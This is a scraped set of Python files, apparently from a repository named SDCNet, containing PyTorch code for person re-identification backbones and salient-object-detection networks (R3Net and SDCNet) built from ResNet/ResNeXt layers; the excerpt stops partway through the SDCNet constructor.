self.in_planes = 2048
self.base = Jointout_ResNet(last_stride=last_stride,
block=IN_Bottleneck, frozen_stages=cfg.MODEL.FROZEN,
layers=[3, 4, 6, 3]) #
print('using resnet50 as a backbone')
print(self.base)
elif model_name == 'resnet18':
self.in_planes = 512
self.base = ResNet(last_stride=last_stride,
block=BasicBlock, frozen_stages=cfg.MODEL.FROZEN,
layers=[2, 2, 2, 2])
print('using resnet18 as a backbone')
elif model_name == 'resnet34':
self.in_planes = 512
self.base = ResNet(last_stride=last_stride,
block=BasicBlock, frozen_stages=cfg.MODEL.FROZEN,
layers=[3, 4, 6, 3])
print('using resnet34 as a backbone')
elif model_name == 'resnet50_ibn_a':
self.in_planes = 2048
self.base = resnet50_ibn_a(last_stride)
print('using se_resnet50_ibn_a as a backbone')
elif model_name == 'se_resnet50_ibn_a':
self.in_planes = 2048
self.base = se_resnet50_ibn_a(
last_stride, frozen_stages=cfg.MODEL.FROZEN)
print('using se_resnet50_ibn_a as a backbone')
elif model_name == 'resnet101_ibn_a':
self.in_planes = 2048
self.base = resnet101_ibn_a(
last_stride, frozen_stages=cfg.MODEL.FROZEN)
print('using resnet101_ibn_a as a backbone')
elif model_name == 'se_resnet101_ibn_a':
self.in_planes = 2048
self.base = se_resnet101_ibn_a(
last_stride, frozen_stages=cfg.MODEL.FROZEN)
print('using se_resnet101_ibn_a as a backbone')
else:
print('unsupported backbone: got {}'.format(model_name))
if pretrain_choice == 'imagenet':
self.base.load_param(model_path)
print('Loading pretrained ImageNet model......from {}'.format(model_path))
self.gap = nn.AdaptiveAvgPool2d(1)
self.num_classes = num_classes
if self.cos_layer:
print('using cosine layer')
self.arcface = ArcFace(
self.in_planes, self.num_classes, s=30.0, m=0.50)
else:
self.classifier = nn.Linear(
self.in_planes, self.num_classes, bias=False)
self.classifier.apply(weights_init_classifier)
if model_name == 'Jointin_resnet50_SNR3':
self.classifier = nn.Linear(
self.in_planes, self.num_classes, bias=False)
self.classifier.apply(weights_init_classifier)
self.classifier1 = nn.Linear(512, self.num_classes, bias=False)
self.classifier1.apply(weights_init_classifier)
self.classifier2 = nn.Linear(512, self.num_classes, bias=False)
self.classifier2.apply(weights_init_classifier)
self.classifier3 = nn.Linear(512, self.num_classes, bias=False)
self.classifier3.apply(weights_init_classifier)
self.classifier4 = nn.Linear(512, self.num_classes, bias=False)
self.classifier4.apply(weights_init_classifier)
self.classifier5 = nn.Linear(1024, self.num_classes, bias=False)
self.classifier5.apply(weights_init_classifier)
self.classifier6 = nn.Linear(256, self.num_classes, bias=False)
self.classifier6.apply(weights_init_classifier)
self.classifier7 = nn.Linear(256, self.num_classes, bias=False)
self.classifier7.apply(weights_init_classifier)
self.classifier8 = nn.Linear(256, self.num_classes, bias=False)
self.classifier8.apply(weights_init_classifier)
self.classifier9 = nn.Linear(256, self.num_classes, bias=False)
self.classifier9.apply(weights_init_classifier)
self.classifier10 = nn.Linear(512, self.num_classes, bias=False)
self.classifier10.apply(weights_init_classifier)
self.classifier11 = nn.Linear(128, self.num_classes, bias=False)
self.classifier11.apply(weights_init_classifier)
self.classifier12 = nn.Linear(128, self.num_classes, bias=False)
self.classifier12.apply(weights_init_classifier)
self.classifier13 = nn.Linear(128, self.num_classes, bias=False)
self.classifier13.apply(weights_init_classifier)
self.classifier14 = nn.Linear(128, self.num_classes, bias=False)
self.classifier14.apply(weights_init_classifier)
self.classifier15 = nn.Linear(256, self.num_classes, bias=False)
self.classifier15.apply(weights_init_classifier)
self.classifier16 = nn.Linear(64, self.num_classes, bias=False)
self.classifier16.apply(weights_init_classifier)
self.classifier17 = nn.Linear(64, self.num_classes, bias=False)
self.classifier17.apply(weights_init_classifier)
self.classifier18 = nn.Linear(64, self.num_classes, bias=False)
self.classifier18.apply(weights_init_classifier)
self.classifier19 = nn.Linear(64, self.num_classes, bias=False)
self.classifier19.apply(weights_init_classifier)
elif 'Jointout' in model_name:
self.classifier0 = nn.Linear(64, self.num_classes, bias=False)
self.classifier0.apply(weights_init_classifier)
self.classifier0_1 = nn.Linear(64, self.num_classes, bias=False)
self.classifier0_1.apply(weights_init_classifier)
self.classifier1 = nn.Linear(256, self.num_classes, bias=False)
self.classifier1.apply(weights_init_classifier)
self.classifier1_1 = nn.Linear(256, self.num_classes, bias=False)
self.classifier1_1.apply(weights_init_classifier)
self.classifier2 = nn.Linear(512, self.num_classes, bias=False)
self.classifier2.apply(weights_init_classifier)
self.classifier2_1 = nn.Linear(512, self.num_classes, bias=False)
self.classifier2_1.apply(weights_init_classifier)
self.classifier3 = nn.Linear(1024, self.num_classes, bias=False)
self.classifier3.apply(weights_init_classifier)
self.classifier3_1 = nn.Linear(1024, self.num_classes, bias=False)
self.classifier3_1.apply(weights_init_classifier)
self.classifier4 = nn.Linear(2048, self.num_classes, bias=False)
self.classifier4.apply(weights_init_classifier)
self.classifier4_1 = nn.Linear(2048, self.num_classes, bias=False)
self.classifier4_1.apply(weights_init_classifier)
self.bottleneck = nn.BatchNorm1d(self.in_planes)
self.bottleneck.bias.requires_grad_(False)
self.bottleneck.apply(weights_init_kaiming)
def forward(self, x, label=None, camid=None): # label is unused if self.cos_layer == 'no'
if self.training and self.model_name == 'Jointin_resnet50_SNR3':
x, x4_2, x4_1, res4_2, res4_1, x3_3, x3_2, x3_1, res3_2, res3_1, x2_3, x2_2, x2_1, res2_2, res2_1, x1_3, x1_2, x1_1, res1_2, res1_1 = self.base(x, camid)
global_feat = nn.functional.avg_pool2d(x, x.shape[2:4])
global_feat = global_feat.view(global_feat.shape[0], -1)
feat = self.bottleneck(global_feat)
cls_score = self.classifier(feat)
fx4_2 = nn.functional.avg_pool2d(x4_2, x4_2.shape[2:4])
fx4_2 = fx4_2.view(fx4_2.shape[0], -1)
ax4_2 = self.classifier1(fx4_2)
fx4_1 = nn.functional.avg_pool2d(x4_1, x4_1.shape[2:4])
fx4_1 = fx4_1.view(fx4_1.shape[0], -1)
ax4_1 = self.classifier2(fx4_1)
fres4_2 = nn.functional.avg_pool2d(res4_2, res4_2.shape[2:4])
fres4_2 = fres4_2.view(fres4_2.shape[0], -1)
ares4_2 = self.classifier3(fres4_2)
fres4_1 = nn.functional.avg_pool2d(res4_1, res4_1.shape[2:4])
fres4_1 = fres4_1.view(fres4_1.shape[0], -1)
ares4_1 = self.classifier4(fres4_1)
fx3_3 = nn.functional.avg_pool2d(x3_3, x3_3.shape[2:4])
fx3_3 = fx3_3.view(fx3_3.shape[0], -1)
ax3_3 = self.classifier5(fx3_3)
fx3_2 = nn.functional.avg_pool2d(x3_2, x3_2.shape[2:4])
fx3_2 = fx3_2.view(fx3_2.shape[0], -1)
ax3_2 = self.classifier6(fx3_2)
fx3_1 = nn.functional.avg_pool2d(x3_1, x3_1.shape[2:4])
fx3_1 = fx3_1.view(fx3_1.shape[0], -1)
ax3_1 = self.classifier7(fx3_1)
fres3_2 = nn.functional.avg_pool2d(res3_2, res3_2.shape[2:4])
fres3_2 = fres3_2.view(fres3_2.shape[0], -1)
ares3_2 = self.classifier8(fres3_2)
fres3_1 = nn.functional.avg_pool2d(res3_1, res3_1.shape[2:4])
fres3_1 = fres3_1.view(fres3_1.shape[0], -1)
ares3_1 = self.classifier9(fres3_1)
fx2_3 = nn.functional.avg_pool2d(x2_3, x2_3.shape[2:4])
fx2_3 = fx2_3.view(fx2_3.shape[0], -1)
ax2_3 = self.classifier10(fx2_3)
fx2_2 = nn.functional.avg_pool2d(x2_2, x2_2.shape[2:4])
fx2_2 = fx2_2.view(fx2_2.shape[0], -1)
ax2_2 = self.classifier11(fx2_2)
fx2_1 = nn.functional.avg_pool2d(x2_1, x2_1.shape[2:4])
fx2_1 = fx2_1.view(fx2_1.shape[0], -1)
ax2_1 = self.classifier12(fx2_1)
fres2_2 = nn.functional.avg_pool2d(res2_2, res2_2.shape[2:4])
fres2_2 = fres2_2.view(fres2_2.shape[0], -1)
ares2_2 = self.classifier13(fres2_2)
fres2_1 = nn.functional.avg_pool2d(res2_1, res2_1.shape[2:4])
fres2_1 = fres2_1.view(fres2_1.shape[0], -1)
ares2_1 = self.classifier14(fres2_1)
fx1_3 = nn.functional.avg_pool2d(x1_3, x1_3.shape[2:4])
fx1_3 = fx1_3.view(fx1_3.shape[0], -1)
ax1_3 = self.classifier15(fx1_3)
fx1_2 = nn.functional.avg_pool2d(x1_2, x1_2.shape[2:4])
fx1_2 = fx1_2.view(fx1_2.shape[0], -1)
ax1_2 = self.classifier16(fx1_2)
fx1_1 = nn.functional.avg_pool2d(x1_1, x1_1.shape[2:4])
fx1_1 = fx1_1.view(fx1_1.shape[0], -1)
ax1_1 = self.classifier17(fx1_1)
fres1_2 = nn.functional.avg_pool2d(res1_2, res1_2.shape[2:4])
fres1_2 = fres1_2.view(fres1_2.shape[0], -1)
ares1_2 = self.classifier18(fres1_2)
fres1_1 = nn.functional.avg_pool2d(res1_1, res1_1.shape[2:4])
fres1_1 = fres1_1.view(fres1_1.shape[0], -1)
ares1_1 = self.classifier19(fres1_1)
return cls_score, global_feat, ax4_2, ax4_1, ares4_2, ares4_1, ax3_3, ax3_2, ax3_1, ares3_2, ares3_1, ax2_3, ax2_2, ax2_1, ares2_2, ares2_1, ax1_3, ax1_2, ax1_1, ares1_2, ares1_1
elif 'Jointout' in self.model_name and self.training:
x0, x1, x2, x3, x4, res0, res1, res2, res3, res4 = self.base(x, camid)
global_feat = nn.functional.avg_pool2d(x4, x4.shape[2:4])
global_feat = global_feat.view(global_feat.shape[0], -1)
feat = self.bottleneck(global_feat)
cls_score = self.classifier4(feat)
res4 = nn.functional.avg_pool2d(res4, res4.shape[2:4])
res4 = res4.view(res4.shape[0], -1)
res4 = self.classifier4_1(res4)
x3 = nn.functional.avg_pool2d(x3, x3.shape[2:4])
x3 = x3.view(x3.shape[0], -1)
x3 = self.classifier3_1(x3)
res3 = nn.functional.avg_pool2d(res3, res3.shape[2:4])
res3 = res3.view(res3.shape[0], -1)
res3 = self.classifier3(res3)
x2 = nn.functional.avg_pool2d(x2, x2.shape[2:4])
x2 = x2.view(x2.shape[0], -1)
x2 = self.classifier2(x2)
res2 = nn.functional.avg_pool2d(res2, res2.shape[2:4])
res2 = res2.view(res2.shape[0], -1)
res2 = self.classifier2_1(res2)
x1 = nn.functional.avg_pool2d(x1, x1.shape[2:4])
x1 = x1.view(x1.shape[0], -1)
x1 = self.classifier1(x1)
res1 = nn.functional.avg_pool2d(res1, res1.shape[2:4])
res1 = res1.view(res1.shape[0], -1)
res1 = self.classifier1_1(res1)
x0 = nn.functional.avg_pool2d(x0, x0.shape[2:4])
x0 = x0.view(x0.shape[0], -1)
x0 = self.classifier0(x0)
res0 = nn.functional.avg_pool2d(res0, res0.shape[2:4])
res0 = res0.view(res0.shape[0], -1)
res0 = self.classifier0_1(res0)
return global_feat, x0, x1, x2, x3, cls_score, res0, res1, res2, res3, res4
x = self.base(x, camid)
# print(x.shape)
global_feat = nn.functional.avg_pool2d(x, x.shape[2:4])
# print(global_feat.shape)
# print(x.shape)
# for converting to ONNX, the kernel size must be changed from x.shape[2:4] to a constant, e.g. [20, 20]
#global_feat = nn.functional.avg_pool2d(x, [16, 16])
# flatten to (bs, 2048), global_feat.shape[0]
global_feat = global_feat.view(global_feat.shape[0], -1)
feat = self.bottleneck(global_feat)
if self.neck == 'no':
feat = global_feat
elif self.neck == 'bnneck':
feat = self.bottleneck(global_feat)
if self.training:
if self.cos_layer:
cls_score = self.arcface(feat, label)
else:
cls_score = self.classifier(feat)
return cls_score, global_feat # global feature for triplet loss
else:
if self.neck_feat == 'after':
# print("Test with feature after BN")
return feat
else:
# print("Test with feature before BN")
return global_feat
def load_param(self, trained_path):
param_dict = torch.load(trained_path)
for i in param_dict:
if 'classifier' in i or 'arcface' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
print('Loading pretrained model from {}'.format(trained_path))
def load_param_finetune(self, model_path):
param_dict = torch.load(model_path)
# for i in param_dict:
# print(i)#change by sb
# self.state_dict()[i].copy_(param_dict[i])
print('Loading pretrained model for finetuning from {}'.format(model_path))
def make_model(cfg, num_class):
model = Backbone(num_class, cfg)
return model
|
Python
| 399
| 48.255638
| 216
|
/model/make_model.py
| 0.573042
| 0.515189
|
Sssssbo/SDCNet
|
refs/heads/master
|
resnet50_path = './resnet/resnet50-19c8e357.pth'
|
Python
| 1
| 48
| 48
|
/resnet/config.py
| 0.755102
| 0.55102
|
Sssssbo/SDCNet
|
refs/heads/master
|
import torch
import torch.nn.functional as F
from torch import nn
from resnext import ResNeXt101
class R3Net(nn.Module):
def __init__(self):
super(R3Net, self).__init__()
res50 = ResNeXt101()
self.layer0 = res50.layer0
self.layer1 = res50.layer1
self.layer2 = res50.layer2
self.layer3 = res50.layer3
self.layer4 = res50.layer4
self.reduce_low = nn.Sequential(
nn.Conv2d(64 + 256 + 512, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce_high = nn.Sequential(
nn.Conv2d(1024 + 2048, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
_ASPP(256)
)
self.predict0 = nn.Conv2d(256, 1, kernel_size=1)
self.predict1 = nn.Sequential(
nn.Conv2d(257, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict2 = nn.Sequential(
nn.Conv2d(257, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict3 = nn.Sequential(
nn.Conv2d(257, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict4 = nn.Sequential(
nn.Conv2d(257, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict5 = nn.Sequential(
nn.Conv2d(257, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict6 = nn.Sequential(
nn.Conv2d(257, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
for m in self.modules():
if isinstance(m, nn.ReLU) or isinstance(m, nn.Dropout):
m.inplace = True
def forward(self, x, label = None):
layer0 = self.layer0(x)
layer1 = self.layer1(layer0)
layer2 = self.layer2(layer1)
layer3 = self.layer3(layer2)
layer4 = self.layer4(layer3)
l0_size = layer0.size()[2:]
reduce_low = self.reduce_low(torch.cat((
layer0,
F.interpolate(layer1, size=l0_size, mode='bilinear', align_corners=True),
F.interpolate(layer2, size=l0_size, mode='bilinear', align_corners=True)), 1))
reduce_high = self.reduce_high(torch.cat((
layer3,
F.interpolate(layer4, size=layer3.size()[2:], mode='bilinear', align_corners=True)), 1))
reduce_high = F.interpolate(reduce_high, size=l0_size, mode='bilinear', align_corners=True)
predict0 = self.predict0(reduce_high)
predict1 = self.predict1(torch.cat((predict0, reduce_low), 1)) + predict0
predict2 = self.predict2(torch.cat((predict1, reduce_high), 1)) + predict1
predict3 = self.predict3(torch.cat((predict2, reduce_low), 1)) + predict2
predict4 = self.predict4(torch.cat((predict3, reduce_high), 1)) + predict3
predict5 = self.predict5(torch.cat((predict4, reduce_low), 1)) + predict4
predict6 = self.predict6(torch.cat((predict5, reduce_high), 1)) + predict5
predict0 = F.interpolate(predict0, size=x.size()[2:], mode='bilinear', align_corners=True)
predict1 = F.interpolate(predict1, size=x.size()[2:], mode='bilinear', align_corners=True)
predict2 = F.interpolate(predict2, size=x.size()[2:], mode='bilinear', align_corners=True)
predict3 = F.interpolate(predict3, size=x.size()[2:], mode='bilinear', align_corners=True)
predict4 = F.interpolate(predict4, size=x.size()[2:], mode='bilinear', align_corners=True)
predict5 = F.interpolate(predict5, size=x.size()[2:], mode='bilinear', align_corners=True)
predict6 = F.interpolate(predict6, size=x.size()[2:], mode='bilinear', align_corners=True)
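# during training all side outputs are returned for deep supervision;
# at inference only the sigmoid of the final prediction is returned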
if self.training:
return predict0, predict1, predict2, predict3, predict4, predict5, predict6
return torch.sigmoid(predict6)
#--------------------------------------------------------------------------------------------
class SDCNet(nn.Module):
def __init__(self, num_classes):
super(SDCNet, self).__init__()
res50 = ResNeXt101()
self.layer0 = res50.layer0
self.layer1 = res50.layer1
self.layer2 = res50.layer2
self.layer3 = res50.layer3
self.layer4 = res50.layer4
self.reducex = nn.Sequential(
nn.Conv2d(2048, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
_ASPP(256)
)
self.reduce5 = nn.Sequential(
nn.Conv2d(64 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce6 = nn.Sequential(
nn.Conv2d(512, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce7 = nn.Sequential(
nn.Conv2d(512, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce8 = nn.Sequential(
nn.Conv2d(512, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce9 = nn.Sequential(
nn.Conv2d(512, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce10 = nn.Sequential(
nn.Conv2d(512, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
# --------------extra module---------------
self.reduce3_0 = nn.Sequential(
nn.Conv2d(1024 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce3_1 = nn.Sequential(
nn.Conv2d(1024 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce3_2 = nn.Sequential(
nn.Conv2d(1024 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce3_3 = nn.Sequential(
nn.Conv2d(1024 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce3_4 = nn.Sequential(
nn.Conv2d(1024 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce2_0 = nn.Sequential(
nn.Conv2d(512 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce2_1 = nn.Sequential(
nn.Conv2d(512 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce2_2 = nn.Sequential(
nn.Conv2d(512 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce2_3 = nn.Sequential(
nn.Conv2d(512 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce2_4 = nn.Sequential(
nn.Conv2d(512 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce1_0 = nn.Sequential(
nn.Conv2d(256 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce1_1 = nn.Sequential(
nn.Conv2d(256 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce1_2 = nn.Sequential(
nn.Conv2d(256 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce1_3 = nn.Sequential(
nn.Conv2d(256 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce1_4 = nn.Sequential(
nn.Conv2d(256 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce0_0 = nn.Sequential(
nn.Conv2d(64, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce0_1 = nn.Sequential(
nn.Conv2d(64, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce0_2 = nn.Sequential(
nn.Conv2d(64, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce0_3 = nn.Sequential(
nn.Conv2d(64, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce0_4 = nn.Sequential(
nn.Conv2d(64, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
# self.predict0 = nn.Conv2d(256, 1, kernel_size=1)
self.predict1 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict2 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict3 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict4 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict5 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict6 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict7 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict8 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict9 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict10 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.pre4 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 2, kernel_size=1)
)
self.pre3 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
